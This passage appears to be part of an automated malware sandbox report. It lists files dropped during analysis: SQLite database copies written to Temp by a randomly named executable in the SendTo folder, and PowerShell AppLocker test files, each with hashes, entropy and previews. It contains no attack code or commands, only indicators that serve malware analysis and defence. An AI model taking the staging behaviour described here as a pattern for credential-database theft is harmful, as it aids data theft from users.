                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Wk5CYOA2nT

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\WoPpsGfeOe

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\WzFunTv61w

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\XQoBYWI5t5

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\XRNwqNVWu0

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\YKsfNvB8Ym

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Z2q5QLNFEy

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ZH9exk3ERo

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Zaav7KAwRB

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ZdCF0M7FOF

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_022qfnun.xmb.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e41njop.nue.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4t2maywe.2yw.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rd1vxga.k0y.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w0aeenz.nui.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awp2pek5.zaq.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imnge3nu.wxc.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhu0g322.nu0.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jp5aavtj.f2m.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzlesi32.dcz.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0kipxzi.img.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osltdklw.4fc.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plhcdvmf.1vz.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzog5tjx.14f.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rb0mqacw.q30.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szkknbxs.d1b.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh00ztz2.0ho.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhnarowz.ohv.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
